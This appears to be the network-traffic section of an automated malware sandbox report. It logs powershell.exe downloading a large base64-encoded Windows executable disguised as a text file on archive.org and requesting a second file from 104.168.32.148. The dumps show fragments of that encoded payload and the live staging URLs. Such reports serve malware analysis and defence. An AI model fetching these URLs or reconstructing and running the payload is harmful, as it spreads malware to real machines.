                                                          Oct 2, 2024 05:30:42.848915100 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.848939896 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.848961115 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.894660950 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.894691944 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.894896984 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.894937992 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.894983053 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.895600080 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.895621061 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.895667076 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.895679951 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.895714998 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.896495104 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.896511078 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.896558046 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.896570921 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.896608114 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.897638083 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.897653103 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.897722960 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.897733927 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.897767067 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.962896109 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.962932110 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.963130951 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.963171005 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.963222027 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.963764906 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.963782072 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.963819027 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.963830948 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.963850975 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.963867903 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.964529037 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.964543104 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.964576960 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.964587927 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.964608908 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.964622974 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.965610981 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.965626955 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.965672970 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.965682983 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.965699911 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.965713978 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.030827999 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.030859947 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.031008959 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.031044006 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.031186104 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.031697989 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.031716108 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.031769991 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.031780958 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.031816959 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.032337904 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.032354116 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.032391071 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.032399893 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.032423019 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.032438040 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.033633947 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.033649921 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.033698082 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.033710003 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.033726931 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.033746004 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.099143028 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.099210024 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.099256992 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.099297047 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.099315882 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.099344015 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.099812031 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.099858999 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.099895954 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.099905014 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.099929094 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.099951029 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.100601912 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.100646973 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.100681067 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.100687981 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:43.100718021 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.100733042 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:43.101696968 CEST  443    49730  207.241.227.240  192.168.2.4
                                                          Oct 2, 2024 05:30:43.101737022 CEST  443    49730  207.241.227.240  192.168.2.4
                                                          Oct 2, 2024 05:30:43.101758003 CEST  49730  443    192.168.2.4      207.241.227.240
                                                          Oct 2, 2024 05:30:43.101768017 CEST  443    49730  207.241.227.240  192.168.2.4
                                                          Oct 2, 2024 05:30:43.101794958 CEST  49730  443    192.168.2.4      207.241.227.240
                                                          Oct 2, 2024 05:30:43.101819992 CEST  49730  443    192.168.2.4      207.241.227.240
                                                          Oct 2, 2024 05:30:43.140880108 CEST  443    49730  207.241.227.240  192.168.2.4
                                                          Oct 2, 2024 05:30:43.140957117 CEST  443    49730  207.241.227.240  192.168.2.4
                                                          Oct 2, 2024 05:30:43.141002893 CEST  49730  443    192.168.2.4      207.241.227.240
                                                          Oct 2, 2024 05:30:43.141047001 CEST  443    49730  207.241.227.240  192.168.2.4
                                                          Oct 2, 2024 05:30:43.141067028 CEST  49730  443    192.168.2.4      207.241.227.240
                                                          Oct 2, 2024 05:30:43.141087055 CEST  49730  443    192.168.2.4      207.241.227.240
                                                          Oct 2, 2024 05:30:43.167488098 CEST  443    49730  207.241.227.240  192.168.2.4
                                                          Oct 2, 2024 05:30:43.167587042 CEST  49730  443    192.168.2.4      207.241.227.240
                                                          Oct 2, 2024 05:30:43.167620897 CEST  443    49730  207.241.227.240  192.168.2.4
                                                          Oct 2, 2024 05:30:43.167666912 CEST  49730  443    192.168.2.4      207.241.227.240
                                                          Oct 2, 2024 05:30:43.167684078 CEST  443    49730  207.241.227.240  192.168.2.4
                                                          Oct 2, 2024 05:30:43.167726994 CEST  49730  443    192.168.2.4      207.241.227.240
                                                          Oct 2, 2024 05:30:43.170521975 CEST  49730  443    192.168.2.4      207.241.227.240
                                                          Oct 2, 2024 05:30:43.255940914 CEST  49731  80     192.168.2.4      104.168.32.148
                                                          Oct 2, 2024 05:30:43.260996103 CEST  80     49731  104.168.32.148   192.168.2.4
                                                          Oct 2, 2024 05:30:43.261172056 CEST  49731  80     192.168.2.4      104.168.32.148
                                                          Oct 2, 2024 05:30:43.261233091 CEST  49731  80     192.168.2.4      104.168.32.148
                                                          Oct 2, 2024 05:30:43.266458988 CEST  80     49731  104.168.32.148   192.168.2.4
                                                          Oct 2, 2024 05:30:43.731539965 CEST  80     49731  104.168.32.148   192.168.2.4
                                                          Oct 2, 2024 05:30:43.772026062 CEST  49731  80     192.168.2.4      104.168.32.148
                                                          Oct 2, 2024 05:30:43.904550076 CEST  49731  80     192.168.2.4      104.168.32.148
                                                          Timestamp                            Source Port  Dest Port  Source IP    Dest IP
                                                          Oct 2, 2024 05:30:39.254654884 CEST  52882        53         192.168.2.4  1.1.1.1
                                                          Oct 2, 2024 05:30:39.404122114 CEST  53           52882      1.1.1.1      192.168.2.4
                                                          Oct 2, 2024 05:30:56.528856993 CEST  53           50503      1.1.1.1      192.168.2.4
                                                          Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                     Type            Class        DNS over HTTPS
                                                          Oct 2, 2024 05:30:39.254654884 CEST  192.168.2.4  1.1.1.1  0x9eb1    Standard query (0)  ia600100.us.archive.org  A (IP address)  IN (0x0001)  false
                                                          Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                     CName  Address          Type            Class        DNS over HTTPS
                                                          Oct 2, 2024 05:30:39.404122114 CEST  1.1.1.1    192.168.2.4  0x9eb1    No error (0)  ia600100.us.archive.org         207.241.227.240  A (IP address)  IN (0x0001)  false
                                                          • ia600100.us.archive.org
                                                          • 104.168.32.148
                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                          0           192.168.2.4  49731        104.168.32.148  80                7768  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Timestamp                            Bytes transferred  Direction  Data
                                                          Oct 2, 2024 05:30:43.261233091 CEST  78                 OUT        GET /345/CHPPZA.txt HTTP/1.1
                                                          Host: 104.168.32.148
                                                          Connection: Keep-Alive
                                                          Oct 2, 2024 05:30:43.731539965 CEST  541                IN         HTTP/1.1 404 Not Found
                                                          Date: Wed, 02 Oct 2024 03:30:44 GMT
                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                          Content-Length: 300
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 31 2e 32 35 20 53 65 72 76 65 72 20 61 74 20 31 30 34 2e 31 36 38 2e 33 32 2e 31 34 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Server at 104.168.32.148 Port 80</address></body></html>


                                                          Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                          0           192.168.2.4  49730        207.241.227.240  443               7768  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Timestamp                Bytes transferred  Direction  Data
                                                          2024-10-02 03:30:40 UTC  109                OUT        GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1
                                                          Host: ia600100.us.archive.org
                                                          Connection: Keep-Alive
                                                          2024-10-02 03:30:40 UTC  606                IN         HTTP/1.1 200 OK
                                                          Server: nginx/1.24.0 (Ubuntu)
                                                          Date: Wed, 02 Oct 2024 03:30:40 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Content-Length: 2823512
                                                          Last-Modified: Wed, 11 Sep 2024 23:50:18 GMT
                                                          Connection: close
                                                          ETag: "66e22cba-2b1558"
                                                          Strict-Transport-Security: max-age=15724800
                                                          Expires: Wed, 02 Oct 2024 09:30:40 GMT
                                                          Cache-Control: max-age=21600
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                          Access-Control-Allow-Credentials: true
                                                          Accept-Ranges: bytes
                                                          2024-10-02 03:30:40 UTC15778INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 42 6f 43 42 62 6f 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 45 59 67 41 41 41 49 41 41 41 41 41 41 41 41 76 6d 55 67 41 41 41 67 41 41 41 41 67 43 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                          Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABoCBboAAAAAAAAAAOAADiELATAAAEYgAAAIAAAAAAAAvmUgAAAgAAAAgCAAAABAAAAgAAAAAgA
                                                          2024-10-02 03:30:40 UTC16384INData Raw: 41 41 41 50 34 4d 45 77 42 46 41 67 41 41 41 41 55 41 41 41 41 31 41 41 41 41 4f 41 41 41 41 41 41 41 45 51 4d 52 46 78 45 49 63 35 73 46 41 41 5a 76 63 51 41 41 43 69 41 42 41 41 41 41 66 73 55 49 41 41 52 37 42 51 6b 41 42 44 6e 4a 2f 2f 2f 2f 4a 69 41 41 41 41 41 41 4f 4c 37 2f 2f 2f 38 41 41 4e 30 66 41 41 41 41 49 41 49 41 41 41 42 2b 78 51 67 41 42 48 73 53 43 51 41 45 4f 73 6e 36 2f 2f 38 6d 49 41 41 41 41 41 41 34 76 76 72 2f 2f 78 45 44 62 79 73 41 41 41 6f 57 50 6f 38 41 41 41 41 67 41 51 41 41 41 48 37 46 43 41 41 45 65 77 73 4a 41 41 51 36 6e 66 72 2f 2f 79 59 67 41 51 41 41 41 44 69 53 2b 76 2f 2f 45 67 63 6f 63 41 41 41 43 68 4d 49 49 41 55 41 41 41 42 2b 78 51 67 41 42 48 76 30 43 41 41 45 4f 6e 58 36 2f 2f 38 6d 49 41 59 41 41 41 41 34 61
                                                          Data Ascii: AAAP4MEwBFAgAAAAUAAAA1AAAAOAAAAAAAEQMRFxEIc5sFAAZvcQAACiABAAAAfsUIAAR7BQkABDnJ////JiAAAAAAOL7///8AAN0fAAAAIAIAAAB+xQgABHsSCQAEOsn6//8mIAAAAAA4vvr//xEDbysAAAoWPo8AAAAgAQAAAH7FCAAEewsJAAQ6nfr//yYgAQAAADiS+v//EgcocAAAChMIIAUAAAB+xQgABHv0CAAEOnX6//8mIAYAAAA4a
                                                          2024-10-02 03:30:40 UTC16384INData Raw: 2f 2f 2f 77 41 52 42 47 39 49 49 77 41 47 62 33 51 41 41 41 6f 54 42 53 41 46 41 41 41 41 4f 44 48 2f 2f 2f 38 41 4f 4e 73 41 41 41 41 67 43 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 4d 41 45 55 67 41 41 41 41 4f 51 49 41 41 47 34 43 41 41 42 61 41 51 41 41 66 51 41 41 41 4d 73 43 41 41 43 4d 41 51 41 41 46 41 45 41 41 4a 77 44 41 41 43 55 41 41 41 41 41 51 4d 41 41 4c 77 41 41 41 41 57 41 41 41 41 33 41 49 41 41 4d 63 42 41 41 43 6a 41 51 41 41 53 67 49 41 41 41 55 41 41 41 43 62 41 67 41 41 58 67 41 41 41 49 45 42 41 41 41 38 41 51 41 41 61 77 45 41 41 42 30 44 41 41 44 38 41 41 41 41 66 77 49 41 41 4f 30 42 41 41 44 68 41 41 41 41 53 77 45 41 41 44 51 41 41 41 42 46 41 41 41 41 49 51 41 41 41 42 4d 43 41 41 41 34 4e 41 49 41 41 42 45 49 4f 6a 30 44 41
                                                          Data Ascii: ///wARBG9IIwAGb3QAAAoTBSAFAAAAODH///8AONsAAAAgCAAAADgEAAAA/gwMAEUgAAAAOQIAAG4CAABaAQAAfQAAAMsCAACMAQAAFAEAAJwDAACUAAAAAQMAALwAAAAWAAAA3AIAAMcBAACjAQAASgIAAAUAAACbAgAAXgAAAIEBAAA8AQAAawEAAB0DAAD8AAAAfwIAAO0BAADhAAAASwEAADQAAABFAAAAIQAAABMCAAA4NAIAABEIOj0DA
                                                          2024-10-02 03:30:40 UTC16384INData Raw: 38 52 43 53 68 31 41 67 41 47 62 7a 49 6a 41 41 59 52 43 57 2f 47 49 67 41 47 4b 48 59 43 41 41 5a 76 4d 69 4d 41 42 69 68 30 41 67 41 47 45 77 38 67 43 51 41 41 41 48 37 46 43 41 41 45 65 38 49 49 41 41 51 36 7a 50 37 2f 2f 79 59 67 44 51 41 41 41 44 6a 42 2f 76 2f 2f 45 51 49 54 41 79 41 49 41 41 41 41 2f 67 34 4b 41 44 69 72 2f 76 2f 2f 4f 42 73 42 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 37 4d 49 41 41 51 36 6c 76 37 2f 2f 79 59 67 41 41 41 41 41 44 69 4c 2f 76 2f 2f 45 51 45 67 70 30 47 63 33 79 41 44 41 41 41 41 59 79 42 63 44 35 4f 49 59 58 37 46 43 41 41 45 65 38 51 49 41 41 52 68 4b 46 51 43 41 41 59 6f 59 77 49 41 42 68 4d 43 49 42 34 41 41 41 41 34 56 2f 37 2f 2f 78 45 48 4f 6c 6f 42 41 41 41 67 43 67 41 41 41 48 37 46 43 41 41 45 65
                                                          Data Ascii: 8RCSh1AgAGbzIjAAYRCW/GIgAGKHYCAAZvMiMABih0AgAGEw8gCQAAAH7FCAAEe8IIAAQ6zP7//yYgDQAAADjB/v//EQITAyAIAAAA/g4KADir/v//OBsBAAAgAAAAAH7FCAAEe7MIAAQ6lv7//yYgAAAAADiL/v//EQEgp0Gc3yADAAAAYyBcD5OIYX7FCAAEe8QIAARhKFQCAAYoYwIABhMCIB4AAAA4V/7//xEHOloBAAAgCgAAAH7FCAAEe
                                                          2024-10-02 03:30:40 UTC16384INData Raw: 41 41 4f 4d 37 38 2f 2f 38 52 41 54 6b 71 2f 66 2f 2f 49 41 63 41 41 41 42 2b 78 51 67 41 42 48 76 6b 43 41 41 45 4f 72 50 38 2f 2f 38 6d 49 41 49 41 41 41 41 34 71 50 7a 2f 2f 77 41 41 41 52 41 41 41 41 49 41 71 77 44 35 70 41 46 33 41 41 41 41 41 43 5a 2b 6f 51 41 41 42 42 54 2b 41 53 6f 41 41 42 70 2b 6f 51 41 41 42 43 6f 41 4b 76 34 4a 41 41 42 76 5a 51 41 41 43 69 6f 41 4b 76 34 4a 41 41 42 76 54 51 41 41 43 69 6f 41 4c 67 44 2b 43 51 41 41 4b 50 77 6c 41 41 59 71 4c 67 44 2b 43 51 41 41 4b 4c 45 45 41 41 59 71 4b 76 34 4a 41 41 42 76 2b 51 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 2b 41 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 45 43 4d 41 42 69 6f 41 4c 67 44 2b 43 51 41 41 4b 43 55 42 41 41 6f 71 48 67 41 6f 73 41 51 41 42 69 70 4b 2f 67 6b 41 41
                                                          Data Ascii: AAOM78//8RATkq/f//IAcAAAB+xQgABHvkCAAEOrP8//8mIAIAAAA4qPz//wAAARAAAAIAqwD5pAF3AAAAACZ+oQAABBT+ASoAABp+oQAABCoAKv4JAABvZQAACioAKv4JAABvTQAACioALgD+CQAAKPwlAAYqLgD+CQAAKLEEAAYqKv4JAABv+QIABioAKv4JAABv+AIABioAKv4JAABvECMABioALgD+CQAAKCUBAAoqHgAosAQABipK/gkAA
                                                          2024-10-02 03:30:40 UTC16384INData Raw: 6f 49 41 41 51 36 59 50 2f 2f 2f 79 59 67 43 41 41 41 41 44 68 56 2f 2f 2f 2f 4f 47 30 41 41 41 41 67 42 77 41 41 41 48 37 46 43 41 41 45 65 37 67 49 41 41 51 36 50 50 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 78 2f 2f 2f 2f 41 41 49 6f 43 77 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 75 67 67 41 42 44 6b 57 2f 2f 2f 2f 4a 69 41 42 41 41 41 41 4f 41 76 2f 2f 2f 38 41 49 49 66 62 73 78 73 67 6d 4f 66 75 4f 6c 67 67 64 4f 74 35 55 57 46 2b 78 51 67 41 42 48 73 43 43 51 41 45 59 53 67 37 41 77 41 47 4b 44 77 44 41 41 5a 36 42 47 39 67 41 41 41 4b 46 79 68 76 41 77 41 47 45 77 49 67 42 67 41 41 41 48 37 46 43 41 41 45 65 37 30 49 41 41 51 36 77 66 37 2f 2f 79 59 67 43 51 41 41 41 44 69 32 2f 76 2f 2f 41 41 51 55 2f 67 45 54 41 53 41 44 41 41 41 41 4f
                                                          Data Ascii: oIAAQ6YP///yYgCAAAADhV////OG0AAAAgBwAAAH7FCAAEe7gIAAQ6PP///yYgBAAAADgx////AAIoCwMABiACAAAAfsUIAAR7uggABDkW////JiABAAAAOAv///8AIIfbsxsgmOfuOlggdOt5UWF+xQgABHsCCQAEYSg7AwAGKDwDAAZ6BG9gAAAKFyhvAwAGEwIgBgAAAH7FCAAEe70IAAQ6wf7//yYgCQAAADi2/v//AAQU/gETASADAAAAO
                                                          2024-10-02 03:30:40 UTC16384INData Raw: 41 41 4f 4b 37 2f 2f 2f 38 52 41 44 70 2f 41 41 41 41 49 41 51 41 41 41 41 34 6e 66 2f 2f 2f 78 45 43 4f 71 49 41 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 38 4d 49 41 41 51 36 67 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 68 33 2f 2f 2f 2f 41 41 49 6f 70 41 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 76 67 67 41 42 44 70 63 2f 2f 2f 2f 4a 69 41 44 41 41 41 41 4f 46 48 2f 2f 2f 38 41 4b 67 41 44 46 43 69 79 41 77 41 47 45 77 41 67 42 51 41 41 41 44 67 37 2f 2f 2f 2f 4f 44 41 41 41 41 41 67 43 41 41 41 41 50 34 4f 41 51 41 34 4a 50 2f 2f 2f 77 41 67 4a 47 76 43 36 53 41 58 47 50 4f 77 59 58 37 46 43 41 41 45 65 38 41 49 41 41 52 68 4b 4b 30 44 41 41 59 6f 73 51 51 41 42 6e 6f 43 65 37 4d 41 41 41 51 54 41 69 41 48 41 41 41 41 4f 50 54 2b 2f
                                                          Data Ascii: AAOK7///8RADp/AAAAIAQAAAA4nf///xECOqIAAAAgAAAAAH7FCAAEe8MIAAQ6gv///yYgAAAAADh3////AAIopAMABiACAAAAfsUIAAR7vggABDpc////JiADAAAAOFH///8AKgADFCiyAwAGEwAgBQAAADg7////ODAAAAAgCAAAAP4OAQA4JP///wAgJGvC6SAXGPOwYX7FCAAEe8AIAARhKK0DAAYosQQABnoCe7MAAAQTAiAHAAAAOPT+/
                                                          2024-10-02 03:30:40 UTC16384INData Raw: 4d 41 41 41 45 6f 38 67 4d 41 42 69 6a 7a 41 77 41 47 45 78 51 67 42 51 41 41 41 48 37 46 43 41 41 45 65 78 49 4a 41 41 51 36 42 65 66 2f 2f 79 59 67 41 51 41 41 41 44 6a 36 35 76 2f 2f 41 41 4b 6c 6c 51 41 41 41 58 4f 4d 41 51 41 4b 6a 4a 63 41 41 41 45 54 41 79 41 67 41 41 41 41 4f 4e 33 6d 2f 2f 38 41 45 51 48 51 43 67 41 41 41 53 6a 79 41 77 41 47 4b 50 4d 44 41 41 59 54 48 79 41 4b 41 41 41 41 4f 4c 2f 6d 2f 2f 38 34 73 4f 2f 2f 2f 79 41 4c 41 41 41 41 66 73 55 49 41 41 52 37 33 77 67 41 42 44 71 6d 35 76 2f 2f 4a 69 42 4a 41 41 41 41 4f 4a 76 6d 2f 2f 38 34 32 50 72 2f 2f 79 42 32 41 41 41 41 4f 49 7a 6d 2f 2f 38 41 41 6d 38 6c 41 41 41 4b 4b 4b 49 41 41 41 6f 6f 41 41 51 41 42 6f 79 57 41 41 41 42 45 77 4d 67 44 77 41 41 41 50 34 4f 4c 67 41 34 59
                                                          Data Ascii: MAAAEo8gMABijzAwAGExQgBQAAAH7FCAAEexIJAAQ6Bef//yYgAQAAADj65v//AAKllQAAAXOMAQAKjJcAAAETAyAgAAAAON3m//8AEQHQCgAAASjyAwAGKPMDAAYTHyAKAAAAOL/m//84sO///yALAAAAfsUIAAR73wgABDqm5v//JiBJAAAAOJvm//842Pr//yB2AAAAOIzm//8AAm8lAAAKKKIAAAooAAQABoyWAAABEwMgDwAAAP4OLgA4Y
                                                          2024-10-02 03:30:40 UTC16384INData Raw: 45 41 41 41 42 2b 78 51 67 41 42 48 76 71 43 41 41 45 4f 53 37 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 49 2f 2f 2f 2f 77 41 54 4d 41 51 41 52 67 41 41 41 4d 73 41 41 42 45 41 41 67 4d 45 4b 50 30 42 41 41 6f 41 41 6e 76 38 41 51 41 4b 4f 68 67 41 41 41 41 44 46 6a 38 52 41 41 41 41 41 77 49 6f 2f 67 45 41 43 76 34 43 46 76 34 42 4f 41 45 41 41 41 41 57 43 67 59 35 45 41 41 41 41 41 41 43 65 2f 51 42 41 41 6f 44 42 47 2f 65 41 51 41 4b 41 41 41 71 41 41 41 54 4d 41 51 41 6c 51 45 41 41 41 51 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 43 77 41 41 41 4b 77 41 41 41 43 48 41 41 41 41 30 77 41 41 41 4f 49 41 41 41 42 55 41 41 41 41 4b 51 41 41 41 41 55 41 41 41 42 45 41 41 41 41 47 67 45 41 41 50 51 41 41 41 43 71 41
